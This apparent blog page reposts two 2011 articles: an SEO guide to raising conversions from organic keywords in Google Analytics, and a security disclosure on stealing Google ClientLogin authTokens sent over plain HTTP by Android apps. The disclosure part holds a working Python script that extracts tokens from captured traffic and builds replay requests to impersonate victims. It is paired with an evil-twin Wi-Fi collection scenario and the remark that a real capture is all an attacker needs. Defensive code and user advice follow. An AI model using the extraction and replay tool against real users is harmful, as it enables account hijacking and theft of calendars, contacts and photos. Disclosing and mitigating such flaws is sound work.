Friday, May 20, 2011

How To Increase Conversions For Organic Keywords

Courtesy: http://searchengineland.com/how-to-increase-conversions-for-organic-keywords-75649
 
Once your website starts getting at least some traffic from organic search queries, you can help increase conversions (inquiries, signups, purchases, phone calls etc) by investigating what happens once people reach your website from the search results.
You can use Google Analytics to choose what keywords to focus on and to check the entrance pages (landing pages) for issues hurting conversions.

How To Choose Which Organic Keywords To Focus On

Most websites have hundreds or thousands of keywords bringing in visitors, so you need an easy way to select which keywords to focus on.
In Google Analytics, you should have either some important (non-ecommerce) conversion Goals being tracked or e-commerce turned on and set up so that it is tracking transactions. You’ll then be able to see the conversion rates by keyword as follows:
  1. Choose Traffic Sources / Keywords
  2. Set a date range of about 3 to 6 months (less if you’ve made a fair number of changes to the site that might have affected rankings, changed URLs etc.)
  3. Choose “Show: non-paid” (See the screen shot below)
  4. Then choose either a Goal Set tab or the Ecommerce tab (see the screen shot below)
Sort on Visits if needed by clicking on the column title (or export to a spreadsheet so you can sort the data in various ways).

Google Analytics Organic Keyword Conversion Rates

Scan through the list and more closely examine any keywords with a conversion rate that is lower than some minimal percentage.
You’ll likely notice a fair number of keywords with a conversion rate of zero. You’ll need to make a judgment call on each of these as to whether the phrase is relevant to the conversion goals of your site.
Sites tend to rank for many phrases that aren’t very relevant and are not likely to lead to conversions. Skip those and focus on the keyword phrases that you believe should be leading to conversions.

Check The Entrance Pages For Issues

Although we have some control through optimization, it’s the search engines that decide which web pages rank high for organic keywords and thus become the entrance pages when people click through (unlike PPC, where you choose the landing page). So the first step is to check any entrance page with more than a minimal number of entrances for issues.
  • In the Google Analytics table of keywords you generated, click on a keyword in the table that you want to examine.
  • Next, click on the drop down selector you’ll see in the screen shot below
Google Analytics drop down selector
  • Then select Landing Page (see in the screen shot below):
Google Analytics Landing Page Selection

You’ll be presented with a list of the entrance pages for that keyword (You may have to click “non-paid” again on this page too).
Unfortunately, Google Analytics doesn’t turn the entrance page listings into links in this table, so you’ll either need to copy and append the URL segment in the listing to the website address in a browser address bar or follow the next steps.
Here’s what I do using two monitors. I open Analytics again in another instance of the browser on the other monitor and do the following:
  1. Choose Content / Top Landing Pages
  2. Select “containing” in the Filter option selector you’ll see in the screen shot below.
  3. Copy all or part of the URL segment from the keyword entrance page listing into the Filter field (see the screen shot below)
  4. This will generate a list of entrance pages that contain the URL segment.
  5. Click on the entrance page you want to examine.

Google Analytics Landing Pages Filter

When you click on the landing page you wish to examine a Content Detail page is presented. Click on the “visit this page” link you’ll see in the screen shot below to view the page.
Google Analytics “Visit This Landing Page” Link

Typical Issues With Organic Entrance Pages

Here are some typical issues we see with organic entrance pages along with some suggestions on how to handle them.
Files with no navigation
We often see the content of frames (albeit less often these days), orphaned “pages”, or the content of pop-up windows get indexed by search engines and viewed without any site navigation. In other words, people are clicking on the search results for these files and the page that they land on has no easy way for them to navigate into the rest of the web site.
For framed pages (if you still have this issue) determine if they really need to be developed as a frames system and rebuild them if not. There are also some JavaScript solutions to ensure that frames pages load correctly. Try Binging “JavaScript ensure frames load correctly”.
Consider not using pop-up windows or putting the content of pop-up windows into a folder and disallow that folder in your robots.txt file. Recheck what entrance pages are being returned after a couple of months.
Old web pages still live
Webmasters often leave old web pages up on the site where they continue to get indexed by search engines. Many times I’ve seen entire old versions of websites moved to a folder on the site, but search engines find and index them. Sometimes, these old pages rank for important keywords.
Unfortunately, old web pages usually have broken navigation links and images, out of date information, and countless other issues. Consider setting up a 301 redirect from the old page(s) to the best page on the live site to capture that keyword traffic for a while. Then work to optimize a page (or pages) on the live site for the keywords.
File not found
You may get “404 file not found” errors for many reasons. You’ll need to determine why this is happening for specific keyword phrases to decide if there are issues that need to be addressed. In some cases “file not found” errors are returned from search results because a web page was deleted or moved and the search engines haven’t removed the old URL from their listings yet.
Set up a 301 redirect for this URL to the best page on the live site. Recheck what entrance pages are being returned for the keywords within a couple of weeks or months.

Is This The Best Entrance Page For The Keyword Phrase?

If there are no issues with an entrance page such as those pointed out in the previous section, consider whether it’s the best page for people to enter the site for this search query. The fact that you are examining the entrance page for this keyword phrase because the conversion rate is low would suggest that it may not be the best entrance page.
Here’s an example from a client’s site. They sell cooking products on their e-commerce website. They also publish their own book on a specific cooking topic which they sell on the site. People do search on the name of the book.
However, the top entrance page, the page ranking highest for the name of the book, was a page for a free recipe from the book. Not only was there no easy way to get to the page where one could buy the book, nowhere on the page was it even mentioned that the book was for sale.

Wednesday, May 18, 2011

The Insecurity of Google's ClientLogin Protocol

Courtesy: Bastian Könings, Jens Nickels, and Florian Schaub
http://www.uni-ulm.de/en/in/mi/staff/koenings/catching-authtokens.html

In a recent blog post Dan Wallach outlined some of the risks of using Android smartphones in open Wifi networks. He found that some Android applications transmit data in the clear, allowing an attacker to eavesdrop on any transmitted information. Besides third-party apps such as Twitter or Facebook, the Google Calendar app also transmitted unencrypted information. Wallach stated that "an eavesdropper can definitely see your calendar transactions and can likely impersonate you to Google Calendar". This also applies to Google Contacts, as another blog post revealed.
We wanted to know if it is really possible to launch an impersonation attack against Google services and started our own analysis. The short answer is: Yes, it is possible, and it is quite easy to do so. Further, the attack is not limited to Google Calendar and Contacts, but is theoretically feasible with all Google services that use the ClientLogin authentication protocol for access to their data APIs.
ClientLogin is meant to be used for authentication by installed applications and Android apps. Basically, to use ClientLogin, an application requests an authentication token (authToken) from the Google service by passing an account name and password over an HTTPS connection. The returned authToken can be used for any subsequent request to the service API and is valid for a maximum duration of 2 weeks. However, if this authToken is used in requests sent over unencrypted HTTP, an adversary can easily sniff the authToken (e.g. with Wireshark, see screenshot below). Because the authToken is not bound to any session or device-specific information, the adversary can subsequently use the captured authToken to access any personal data which is made available through the service API. For instance, the adversary can gain full access to the calendar, contacts information, or private web albums of the respective Google user. This means that the adversary can view, modify or delete any contacts, calendar events, or private pictures. This is not limited to items currently being synced but affects all items of that user.
The attack is very similar to stealing session cookies of websites (sidejacking). The feasibility of sidejacking attacks against well-known websites such as Facebook or Twitter has lately been demonstrated by the Firesheep plugin, which attracted a lot of attention.

Screenshot of Wireshark showing the authToken for ClientLogin in a data API request to the Picasa Web Albums service.

Scope

We tested this attack with Android versions 2.1 (Nexus One), 2.2 (HTC Desire, Nexus One), 2.2.1 (HTC Incredible S), 2.3.3 (Nexus One), 2.3.4 (HTC Desire, Nexus One), and 3.0 (Motorola XOOM) and with the native Google Calendar, Google Contacts, and Gallery apps (or respective synchronization services).
  • Until Android 2.3.3 the Calendar and Contacts apps transmit any request in the clear via http and are therefore vulnerable to the authToken attack. This affects 99.7% of all Android smartphones (stats from 2nd of May 2011). Since Android 2.3 the Gallery app provides Picasa Web Albums synchronization which is also not encrypted.
  • Since Android 2.3.4, the Calendar and Contacts apps are using a secure https connection. However, the Picasa synchronization is still using http and thus is still vulnerable.
  • Our sniffed authTokens were valid for several days (14 days for a sniffed Calendar authToken), which enables adversaries to comfortably capture and make use of tokens at different times and locations.
Use of HTTPS in Android Google Apps:

Android version   Calendar Sync   Contacts Sync   Picasa Sync (Gallery)
3.0               yes             yes             ?
2.3.4             yes             yes             no
2.3.3             no              no              no
2.2.1             no              no              n/a
2.2               no              no              n/a
2.1               no              no              n/a
Note that this vulnerability is not limited to standard Android apps but pertains to any Android app and also to desktop applications that make use of Google services via the ClientLogin protocol over HTTP rather than HTTPS. One example is the Google Calendar provider for Thunderbird when Google Calendar URLs are configured without a leading "https".

Collecting authTokens

To collect such authTokens on a large scale an adversary could set up a wifi access point with a common SSID (evil twin) of an unencrypted wireless network, e.g., T-Mobile, attwifi, starbucks. With default settings, Android phones automatically connect to a previously known network and many apps will attempt syncing immediately. While syncing would fail (unless the adversary forwards the requests), the adversary would capture authTokens for each service that attempted syncing. Due to the long lifetime of authTokens, the adversary can comfortably capture a large number of tokens and make use of them later on from a different location.
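To make the protocol description and the collection scenario above concrete, here is an added Python example; it is not code from the original post, from Google, or from any of the apps discussed. It parses a ClientLogin response into its Auth token, builds the Authorization header a client then sends on every data-API request, and shows the eavesdropper's side over a constructed plaintext capture: every GoogleLogin token is pulled out of the stream and turned into the replay request that impersonates the victim. The endpoint URL and the "GoogleLogin auth=" header form are the documented ClientLogin ones; the token values, hosts, paths and the captured requests are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Token request goes to this endpoint over HTTPS (Email, Passwd, service and
# source as form fields); the reply body is key=value lines and the Auth value
# then rides in the Authorization header of every later data-API request.
CLIENTLOGIN_URL = "https://www.google.com/accounts/ClientLogin"
AUTH_HEADER_PREFIX = "GoogleLogin auth="


def parse_clientlogin_response(body: str) -> dict:
    """Parse the SID/LSID/Auth body returned by ClientLogin."""
    fields = {}
    for line in body.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    if "Auth" not in fields:
        raise ValueError("ClientLogin response carries no Auth token")
    return fields


def build_authorization_header(auth_token: str) -> str:
    """Header value a ClientLogin client attaches to every API request."""
    return AUTH_HEADER_PREFIX + auth_token


@dataclass
class CapturedToken:
    host: str
    path: str
    token: str


# One HTTP request line at the start of a line in a reassembled TCP stream.
REQUEST_LINE = re.compile(rb"^(?:GET|POST|PUT|DELETE) (\S+) HTTP/1\.[01]\r\n", re.M)


def extract_tokens(capture: bytes) -> list:
    """
    The eavesdropper's side: scan plaintext HTTP for requests carrying a
    GoogleLogin header. Inside TLS this header is opaque, which is exactly
    why the switch to https closes the attack.
    """
    found = []
    starts = [m.start() for m in REQUEST_LINE.finditer(capture)]
    for i, start in enumerate(starts):
        end = starts[i + 1] if i + 1 < len(starts) else len(capture)
        request = capture[start:end]
        path = REQUEST_LINE.match(request).group(1).decode()
        head = request.partition(b"\r\n\r\n")[0]      # headers only, body ignored
        host, token = "", None
        for line in head.split(b"\r\n")[1:]:
            name, _, value = line.partition(b":")
            name, value = name.strip().lower(), value.strip()
            if name == b"host":
                host = value.decode()
            elif name == b"authorization" and value.startswith(AUTH_HEADER_PREFIX.encode()):
                token = value[len(AUTH_HEADER_PREFIX):].decode()
        if token:
            found.append(CapturedToken(host, path, token))
    return found


def build_replay_request(captured: CapturedToken, path: Optional[str] = None) -> bytes:
    """
    Impersonation is plain reuse: the token is bound to no device or session,
    so the same header works from any machine, against any path of that
    service, until the token expires.
    """
    target = path or captured.path
    return (f"GET {target} HTTP/1.1\r\nHost: {captured.host}\r\n"
            f"Authorization: {build_authorization_header(captured.token)}\r\n\r\n").encode()


# Constructed sample stream: a Calendar POST and a Picasa GET each leaking a
# token over plain HTTP, plus an unrelated Basic-auth request to ignore.
SAMPLE_CAPTURE = (
    b"POST /calendar/feeds/default/private/full HTTP/1.1\r\n"
    b"Host: www.google.com\r\n"
    b"Authorization: GoogleLogin auth=DQAAAMBAAAAconstructed_calendar_token\r\n"
    b"Content-Type: application/atom+xml\r\n"
    b"Content-Length: 5\r\n"
    b"\r\n"
    b"<a/>\n"
    b"GET /feeds/api/user/default HTTP/1.1\r\n"
    b"Host: picasaweb.google.com\r\n"
    b"GData-Version: 2\r\n"
    b"Authorization: GoogleLogin auth=DQAAAMAAAADconstructed_picasa_token\r\n"
    b"\r\n"
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Authorization: Basic dXNlcjpwYXNz\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for t in extract_tokens(SAMPLE_CAPTURE):
        print(f"{t.host}{t.path} leaked token {t.token[:12]}...")
        print(build_replay_request(t).decode())
```

Feeding the script a real plaintext capture (for instance the TCP payloads Wireshark's "Follow TCP Stream" exports) instead of SAMPLE_CAPTURE is all an attacker needs; there is no cryptography to break, only a header to copy.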

Implications

The implications of this vulnerability range from disclosure to loss of personal information for the Calendar data. For Contact information, private information of others is also affected, potentially including phone numbers, home addresses, and email addresses. Beyond the mere stealing of such information, an adversary could perform subtle changes without the user noticing. For example, an adversary could change the stored email address of the victim's boss or business partners hoping to receive sensitive or confidential material pertaining to their business.

Fixing the issue

What app developers can do:
  • Android apps and synchronization services using ClientLogin should immediately switch to https. In the newest Android release (2.3.4) this step was already taken for the Google Calendar and Contacts apps, but other apps need to follow. The Gallery app is developed by Cooliris, who probably were not made aware of the issue. However, the Android security team told us that they are investigating the Gallery app as well, so hopefully a fix will be integrated in the next release.
  • Google APIs offer more secure authentication services. Switching to OAuth for authentication would mitigate the authToken capture issue. Https should be used in addition to prevent synced data from being transmitted in the clear.
What Google/Android can do:
  • The lifetime of an authToken should be drastically limited.
  • Google services could reject ClientLogin based requests from insecure http connections to enforce use of https. Https is already required for the Google Docs API and will be required for the Google Spreadsheet and Google Sites APIs in September 2011. It should be mandatory for all of Google's data APIs.
  • Automatically connecting to known Wifi-networks could be limited to protected networks. At least a respective option should be provided to users.
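As an added example of the first two server-side measures above (not code from the post or from Google's services), this Python check gates a data-API request on two conditions: the ClientLogin token must have arrived inside TLS, and it must be younger than a short maximum age. The one-hour limit, the in-memory token store, and the choice to revoke a token the moment it is seen on a plaintext connection are this example's own assumptions; the revocation goes one step beyond the rejection the post asks for, on the reasoning that a token observed in the clear must be treated as already captured.

```python
AUTH_HEADER_PREFIX = "GoogleLogin auth="
MAX_TOKEN_AGE_SECONDS = 3600  # assumed policy: one hour instead of two weeks


class TokenStore:
    """Server-side record of issued ClientLogin tokens (token -> issue time)."""

    def __init__(self):
        self._issued = {}

    def issue(self, token: str, issued_at: float) -> None:
        self._issued[token] = issued_at

    def revoke(self, token: str) -> None:
        self._issued.pop(token, None)

    def issued_at(self, token: str):
        return self._issued.get(token)


def token_from_headers(headers: dict):
    """Pull the ClientLogin token out of a header mapping (names case-insensitive)."""
    for name, value in headers.items():
        if name.lower() == "authorization" and value.startswith(AUTH_HEADER_PREFIX):
            return value[len(AUTH_HEADER_PREFIX):]
    return None


def authorize_request(scheme: str, headers: dict, store: TokenStore,
                      now: float, max_age: int = MAX_TOKEN_AGE_SECONDS):
    """
    Gate a data-API request that authenticates with a ClientLogin token.
    Returns (HTTP status, reason). `scheme` must be the scheme the request
    actually arrived on (e.g. wsgi.url_scheme), never a client-supplied value.
    """
    token = token_from_headers(headers)
    if token is None:
        return 401, "missing GoogleLogin authorization"
    if scheme.lower() != "https":
        # The token just travelled in the clear. Refuse it and treat it as
        # burned (revocation is this example's addition); the legitimate app
        # will re-authenticate over HTTPS and receive a fresh token.
        store.revoke(token)
        return 403, "ClientLogin tokens are accepted over HTTPS only"
    issued = store.issued_at(token)
    if issued is None:
        return 401, "unknown or revoked token"
    if now - issued > max_age:
        # Short lifetime: a sniffed token is useless within the hour instead
        # of remaining valid for up to two weeks.
        store.revoke(token)
        return 401, "token expired"
    return 200, "ok"


if __name__ == "__main__":
    store = TokenStore()
    store.issue("DQAAconstructed", issued_at=1000.0)
    hdr = {"Authorization": "GoogleLogin auth=DQAAconstructed"}
    print(authorize_request("https", hdr, store, now=1500.0))   # accepted
    print(authorize_request("http", hdr, store, now=1500.0))    # rejected and revoked
    print(authorize_request("https", hdr, store, now=1500.0))   # now unknown
```

The ordering matters: the scheme check runs before the token lookup so that even an unknown or expired token sent over HTTP gets the same 403, and no information about token validity leaks to an eavesdropper on the plaintext path.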
What Android users can do:
  • Update to Android 2.3.4. Update your phone to the current Android version as soon as possible. However, depending on your phone vendor you may have to wait weeks or months before an update is available for your phone. Hopefully this will change in the future.
  • Switch off automatic synchronization in the settings menu when connecting with open Wifi networks.
  • Let your device forget an open network you previously connected to, to prevent automatic reconnection (long press network name and select forget)
  • The best protection at the moment is to avoid open Wifi networks at all when using affected apps.